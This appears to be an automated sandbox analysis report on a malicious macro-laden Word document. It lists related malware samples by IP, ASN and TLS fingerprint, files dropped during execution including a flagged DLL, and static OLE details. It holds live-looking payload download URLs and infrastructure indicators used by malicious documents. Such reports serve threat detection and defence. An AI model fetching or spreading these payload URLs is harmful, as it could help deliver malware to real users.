Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
212.227.200.73	MENSAJE.doc	Get hash	malicious	Browse	singleworld-online.com/img/DeeAt/
	MENSAJE.doc	Get hash	malicious	Browse	singleworld-online.com/img/DeeAt/
	Archivo_AB-96114571.doc	Get hash	malicious	Browse	singleworld-online.com/img/DeeAt/
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	singleworld-online.com/img/DeeAt/
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	singleworld-online.com/img/DeeAt/
172.217.6.174	Scan_Image_From_QUINNEY_&_ASSOCIATES.pdf	Get hash	malicious	Browse	crl.pki.goog/GTSGIAG3.crl
172.217.6.174	d5#U309a.doc	Get hash	malicious	Browse	clients1.google.com/ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEbXmsCz9vTc
190.55.186.229	Invoice 6682363.doc	Get hash	malicious	Browse	190.55.186.229/zu0s8fp/p0ci9j50w974/cj5r0kfb71n/m8g30yu0kjfggim2u/66n2ab/ipuz3m08m8x037v8/
	certificado.doc	Get hash	malicious	Browse	190.55.186.229/t3u070voc/dhvfsiwa8/4hr1scfgu20pt/iroc8/mlfa/v0pznqop/
	SecuriteInfo.com.Mal.DocDl-K.24054.doc	Get hash	malicious	Browse	190.55.186.229/i9lbsrtqcu0eub47zf/
	SecuriteInfo.com.Mal.DocDl-K.32352.doc	Get hash	malicious	Browse	190.55.186.229/jgeu/
	SecuriteInfo.com.Mal.DocDl-K.460.doc	Get hash	malicious	Browse	190.55.186.229/mlqum5rvy23mclyw98/bxc1sxq6pyd4l/glso7yy9y6j/63ww5/j94pvx/
	PQWX99943.doc	Get hash	malicious	Browse	190.55.186.229/b0sm4wo0eycy/enwxs3/ch9vx64v/

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AUTOMATTICUS	Acunetix Premium v13.0.201112128 Activation Tool.exe	Get hash	malicious	Browse	192.0.76.3
	D6mimHOcsr.exe	Get hash	malicious	Browse	192.0.78.24
	MPbBCArHPF.exe	Get hash	malicious	Browse	192.0.78.24
	mtsWWNDaNF.exe	Get hash	malicious	Browse	192.0.78.208
	A-SEONG CO.,LTD.pdf.exe	Get hash	malicious	Browse	192.0.78.24
	yty5HOxW3o.exe	Get hash	malicious	Browse	192.0.78.24
	KtJsMM8kdE.exe	Get hash	malicious	Browse	192.0.78.24
	fl3TkfT33S.exe	Get hash	malicious	Browse	192.0.78.24
	Qs6ySVV95N.exe	Get hash	malicious	Browse	192.0.78.24
	inquiry PR11020204168.xlsx	Get hash	malicious	Browse	192.0.78.24
	r.exe	Get hash	malicious	Browse	192.0.78.25
	xwE6WlNHu1.exe	Get hash	malicious	Browse	192.0.78.24
	1bTpgGVn5mfDSUq.exe	Get hash	malicious	Browse	192.0.78.24
	yxYmHtT7uT.exe	Get hash	malicious	Browse	192.0.78.25
	XSJY2sHjnq.exe	Get hash	malicious	Browse	192.0.78.24
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	192.0.78.24
	Quote RF-E79-STD-2021-083 Health Safety Items_pdf.exe	Get hash	malicious	Browse	192.0.78.25
	SKM_C221200706052800.exe	Get hash	malicious	Browse	192.0.78.25
	5IpRu2zSfu.dll	Get hash	malicious	Browse	192.0.84.247
	zuwmbstItB.dll	Get hash	malicious	Browse	192.0.84.247
GOOGLEUS	DHL.6.apk	Get hash	malicious	Browse	172.217.20.238
	Tebling_Resortsac_FILE-HP38XM.htm	Get hash	malicious	Browse	172.217.22.225
	DHL.6.apk	Get hash	malicious	Browse	172.217.20.238
	k.dll	Get hash	malicious	Browse	35.247.145.179
	DHL.apk	Get hash	malicious	Browse	216.58.207.138
	560911_P.EXE	Get hash	malicious	Browse	34.102.136.180
	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	34.102.136.180
	67654565677.htmL	Get hash	malicious	Browse	172.217.22.225
	documents_0084568546754.exe	Get hash	malicious	Browse	34.102.136.180
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	34.102.136.180
	pl.cda_310.apk	Get hash	malicious	Browse	172.217.23.14
	pl.cda_310.apk	Get hash	malicious	Browse	172.217.22.238
	Acunetix Premium v13.0.201112128 Activation Tool.exe	Get hash	malicious	Browse	172.217.22.226
	F-Droid.apk	Get hash	malicious	Browse	216.239.35.0
	F-Droid.apk	Get hash	malicious	Browse	172.217.20.238
	org.thoughtcrime.securesms_77202.apk	Get hash	malicious	Browse	216.58.207.138
	org.thoughtcrime.securesms_77202.apk	Get hash	malicious	Browse	172.217.20.234
	fusion.exe	Get hash	malicious	Browse	173.194.69.108
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	172.217.22.206
	recteq_v1.6.3_apkpure.com.apk	Get hash	malicious	Browse	172.217.22.206
CLOUDFLARENETUS	fod1jZt8yK.exe	Get hash	malicious	Browse	104.23.98.190
	info5440.xls	Get hash	malicious	Browse	104.21.7.112
	notif-3615.xls	Get hash	malicious	Browse	104.21.84.93
	RFQ for the supply of materialsservices for P.O. No. - 4700001838.exe	Get hash	malicious	Browse	104.23.99.190
	notif6158.xls	Get hash	malicious	Browse	104.21.84.93
	file.exe	Get hash	malicious	Browse	172.67.188.154
	k.dll	Get hash	malicious	Browse	104.21.88.84
	Quotation for T10495.exe	Get hash	malicious	Browse	104.21.19.200
	FP4554867134UQ.doc	Get hash	malicious	Browse	172.67.215.216
	case (348).xls	Get hash	malicious	Browse	104.21.23.220
	case (348).xls	Get hash	malicious	Browse	172.67.213.245
	MENSAJE.doc	Get hash	malicious	Browse	172.67.156.114
	MENSAJE.doc	Get hash	malicious	Browse	172.67.156.114
	Archivo_AB-96114571.doc	Get hash	malicious	Browse	172.67.156.114
	1_25_2021 11_20_30 a.m., [Payment 457 CMSupportDev].html	Get hash	malicious	Browse	104.16.19.94
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	104.21.89.45
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	104.21.89.45
	documents_0084568546754.exe	Get hash	malicious	Browse	23.227.38.74
	New Order.exe	Get hash	malicious	Browse	172.67.188.154
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	172.67.143.106
ONEANDONE-ASBrauerstrasse48DE	MENSAJE.doc	Get hash	malicious	Browse	212.227.200.73
	MENSAJE.doc	Get hash	malicious	Browse	212.227.200.73
	Archivo_AB-96114571.doc	Get hash	malicious	Browse	212.227.200.73
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	212.227.200.73
	5390080_2021_1-259043.doc	Get hash	malicious	Browse	212.227.200.73
	GV52H7XsQ2.exe	Get hash	malicious	Browse	217.76.142.246
	Shipping Document PL&BL Draft.exe	Get hash	malicious	Browse	74.208.236.161
	13-2021.doc	Get hash	malicious	Browse	88.208.252.128
	mallware.exe	Get hash	malicious	Browse	212.227.15.142
	Messaggio 2001 2021 3-4543.doc	Get hash	malicious	Browse	88.208.252.128
	sLUAeV5Er6.exe	Get hash	malicious	Browse	74.208.236.196
	SecuriteInfo.com.Trojan.PackedNET.507.23078.exe	Get hash	malicious	Browse	74.208.236.121
	SCAN_52858535.doc	Get hash	malicious	Browse	88.208.252.128
	QtEQhJpxAt.exe	Get hash	malicious	Browse	216.250.120.149
	1tqW2LLr74.exe	Get hash	malicious	Browse	217.160.0.94
	PAP001.exe	Get hash	malicious	Browse	212.227.15.158
	PO-RY 001-21 Accuri.jar	Get hash	malicious	Browse	217.160.0.179
	IMG_010357.doc	Get hash	malicious	Browse	217.160.0.242
	r.exe	Get hash	malicious	Browse	217.160.0.204
	PO81053.exe	Get hash	malicious	Browse	74.208.236.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	info5440.xls	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	notif-3615.xls	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	notif6158.xls	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	INC_Y5KPAYAWWU7.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	mensaje_012021_1-538086.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	eiW9G6sAIS.xlsm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	eiW9G6sAIS.xlsm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	2531 2212 2020 QG-826729.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	USD_ Payment Schedule.xls	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	Arch 30 S_07215.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	Info-237-602317.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	8776139.docm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	8776139.docm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	2021_20_01_31624.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	433.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	RFQSDCL1005C1N5STDFM01.doc	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	7375568.docm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	6213805.docm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20
	7375568.docm	Get hash	malicious	Browse	104.21.88.166 212.227.200.73 192.0.78.20

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	326
Entropy (8bit):	3.091749386874233
Encrypted:	false
SSDEEP:	6:kKmwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:pkPlE99SNxAhUegeT2
MD5:	D8D9CB041F05D1C06F9AD4E8048FA455
SHA1:	DE90B45E0B2B6FF10FD829373A1A46EC3644513B
SHA-256:	33540B34D762E48E44D1BAE7AC867863B91615966CE294ACEDCCA4BF2CA39FE1
SHA-512:	54D6598EB932995AF323FB5C4F2B96AB3D6A996CFD1101CDF0A5042278949387DCCBFF6C0F28883434811F1DD766517107FA1F026167A0644BAA24419C47E35F
Malicious:	false
Preview:	p...... ........as.v....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F20-30CA-4646-ACFF-79FC9E14ADCB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{ED51AD77-1C4D-48D3-B650-0535282218FE}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849453
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbs:IiiiiiiiiifdLloZQc8++lsJe1Mzn/n
MD5:	6585ADE50CD55CBC464CE5F3A7B43B6F
SHA1:	E76CAE8F5BFC88E2B831998CD93FB4504ED8306B
SHA-256:	696F31987A387841508A11DEF6FF6D9B64BFA58F9C789BD9906FB8C5CFE6AC6F
SHA-512:	D7EA21C9EC16DF67A6129228A18C2419D0B0D6C80697BF8F0B5FB4C6528FEEBA04D6A28B7B6AC790D63FBE099292F2A886FB0DB25B151A40E80C312ECD674694
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab148B.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\Local\Temp\Tar148C.tmp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	152533
Entropy (8bit):	6.31602258454967
Encrypted:	false
SSDEEP:	1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
MD5:	D0682A3C344DFC62FB18D5A539F81F61
SHA1:	09D3E9B899785DA377DF2518C6175D70CCF9DA33
SHA-256:	4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
SHA-512:	0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
Malicious:	false
Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\N00048481397007.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Jan 26 03:10:39 2021, length=143360, window=hide
Category:	dropped
Size (bytes):	2078
Entropy (8bit):	4.490249812476519
Encrypted:	false
SSDEEP:	48:8Wn/XT0jFKIJnCfQh2Wn/XT0jFKIJnCfQ/:8G/XojFKIBCfQh2G/XojFKIBCfQ/
MD5:	8D9E0A48A4AAE30E16217F595DB95584
SHA1:	6573476790AD3CB528004804EBE2D0E2456D1C5B
SHA-256:	E8169A5348C96CDB111384513B37F512EA047E525F1CE5691765C4E5EEB93654
SHA-512:	A21962D98C389753960E6D8E5EA0622AB0E2DE7FEFB886ECF66FFC2C2C981723FE207FDDBF448E59A1F553EE562D0A9CA12011B6ECCB262F7D0DA3EE9D19C2D9
Malicious:	false
Preview:	L..................F.... .....e..{....e..{.....4.....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2..0..:RT! .N00048~1.DOC..T.......Q.y.Q.y...8.....................N.0.0.0.4.8.4.8.1.3.9.7.0.0.7...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\N00048481397007.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.0.0.0.4.8.4.8.1.3.9.7.0.0.7...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C.........

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	83
Entropy (8bit):	3.9220124011386437
Encrypted:	false
SSDEEP:	3:M1BMWcmGUz/uWcmGUmX1BMWcmGUv:MAumEg
MD5:	9177EA48FE0784FEE174EA5A993CB67D
SHA1:	E16A37EFB21A72B380AECB88FEDF16CCA6D2D212
SHA-256:	E2AD03A823781A81F8F3BC613947C8F8065A4E4CC4EB08431CE74839F35DEC93
SHA-512:	7CBCB55B15FF3CF9C05BF225A7C6291F82F1E7AB0DF3F77DA89A273CC7B2DD98E43A99C727F5D02B8BFD19C786B4072154C92F4AAAD2B74683D357CB25FB974D
Malicious:	false
Preview:	[doc]..N00048481397007.LNK=0..N00048481397007.LNK=0..[doc]..N00048481397007.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
MD5:	F3E6EBAC97D4DEF04C645869D96DC090
SHA1:	F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
SHA-256:	67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
SHA-512:	B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ATCH18MFTYSDMR3EQ34.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5917627193164106
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwoBz8hQCsMqaqvsEHyqvJCwor/zv1YXHyf8OElUVLIu:cyzoBz8ynHnor/zvdf8ObIu
MD5:	97BB13A27E3A3741A9E2F9E6F89C011B
SHA1:	385C35683D61CD43D772A54242259C464935D369
SHA-256:	B5D75980D08CC1134676659462A765AA87FB98A2C7570ED9C7D967E3DA430CDD
SHA-512:	7AB6F29944B8DAFE807FC22B4410D20AA983D5679FA6C8D889479161E4AB0255B9DDF3B620D0320172F121B4C509E4CEF5B2F85FCB8D3C1319FE9E103AB32F76
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$0048481397007.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyCKb0OHlMwBim1ilfln:vdsCkWtPA08/+l
MD5:	F3E6EBAC97D4DEF04C645869D96DC090
SHA1:	F6ADEED4922A5BEFAEC456E3F1BA1C3D424C0F60
SHA-256:	67DC32FE6B29E78D53027D0ABF9458FFC4CD1054A1A060EB96655C2449B5B728
SHA-512:	B6379D87B5913A8087BC0012F0AAFD9C742984C21680AAD112E7D749738A83BA04191293A05B28BF149E99ACF20AD3AD1D018715FEB4ABECA8EB0ED6252B5970
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	624128
Entropy (8bit):	6.903924307081851
Encrypted:	false
SSDEEP:	12288:4YzchQVZnkmt/70MWugxPJZFpf0c1pHVbdJxUR9rNXZL4:L4KV5Hpt8bZHLrnM919
MD5:	DB0C9F047AC2BD305BD1EA3C2D072DA6
SHA1:	2D295892DFD00E5F00E60EE122923920938EC20A
SHA-256:	017EFC765BBC8BE0CE3512BB0707E9C8122BC38553FDB64134B66560D6B40DAB
SHA-512:	EE0B8F0DD9305C469C85A759B1F83605780C73FBC6D2F6570E4D2684B97CE7CF3C81359BB13F0867195AB1A655337165BD0325184825E4914AD8073FE947A021
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...R.......>.......@....@..........................................................................p..."...............................n..................................................................................CODE.............0.................. ..`DATA.........@.......4..............@...BSS..........`.......J...................idata..."...p...$...J..............@....reloc...n.......p...n..............@..P.rsrc...............................@..P....................................@..P........................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Non sed natus asperiores. Ipsum magnam fuga a atque animi sint laboriosam est aspernatur. Ut cupiditate quia., Author: Gabriel Villaseor, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jan 25 08:47:00 2021, Last Saved Time/Date: Mon Jan 25 08:47:00 2021, Number of Pages: 1, Number of Words: 5614, Number of Characters: 32003, Security: 8
Entropy (8bit):	6.195212513334959
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	N00048481397007.doc
File size:	142848
MD5:	ad7db0f946bc5c3bb051cb04f359e6a4
SHA1:	24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256:	4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1
SHA512:	a4b34893134f12724a7fd951d552cf1c3dc2f2bb488506a3ed5e4a94b687e09881a0fe50e25af4de7f41274e8cba539169cda651c95f0c7f4b55d5aa5de6def4
SSDEEP:	1536:KNpHZTgQSz4w4K0vOYOcc2bqrQFfDngtWBj:y1gQSU3K0hzqrQFbKWBj
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "N00048481397007.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
